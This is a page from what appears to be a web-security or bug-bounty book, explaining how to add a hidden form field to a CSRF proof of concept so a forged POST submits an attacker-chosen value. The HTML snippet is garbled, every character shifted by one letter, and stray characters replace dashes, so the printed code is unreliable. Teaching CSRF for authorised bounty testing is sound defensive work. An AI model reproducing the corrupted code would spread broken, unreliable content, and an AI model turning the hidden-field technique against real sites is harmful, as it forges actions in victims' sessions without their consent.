CSRF and Insecure Session Authentication                                    Chapter 6

            Strictly speaking, this CSRF PoC does what we need it to: it illustrates that we can forge
            form requests that originate from our own sources. But to make it just a tiny bit more black
            hat (and show the bounty program a hint of how the vulnerability could be exploited), let's
            add some hidden-field chicanery.

            Here's what our snippet looks like as it changes the visible form field to a dummy value
            and creates a second hidden field that contains our actual payload:

                 IUNM
                  GPSN BDUJPO  IUUQ   XFCTDBOUFTU DPN DTSG DTSGQPTU QIQ
                FODUZQF  BQQMJDBUJPO Y XXX GPSN VSMFODPEFE  NFUIPE  1045
                   MBCFM
                   DPMPS
                    MBCFM
                   JOQVU OBNF  EVNNZ QSPQFSUZ  UZQF  UFYU  WBMVF
                   JOQVU OBNF  QSPQFSUZ  UZQF  IJEEFO  WBMVF  1FBTPVQ
                   JOQVU UZQF  TVCNJU  WBMVF  IUUQ   XFCTDBOUFTU DPN DTSG DTSGQPTU QIQ
                   GPSN
                  IUNM

            You can see in the malicious part d where we're populating the property the web app will
            actually consume d that we're submitting Peasoup as the user's favorite color. The depths of
            our depravity know no bounds.

            Pretending to be a hapless user, when we open our snippet in the browser, we don't see any
            red flags (on the surface). If we opened our EFW tools and started inspecting the hidden
            field element, it would be a different story:




























                                                    [ 109 ]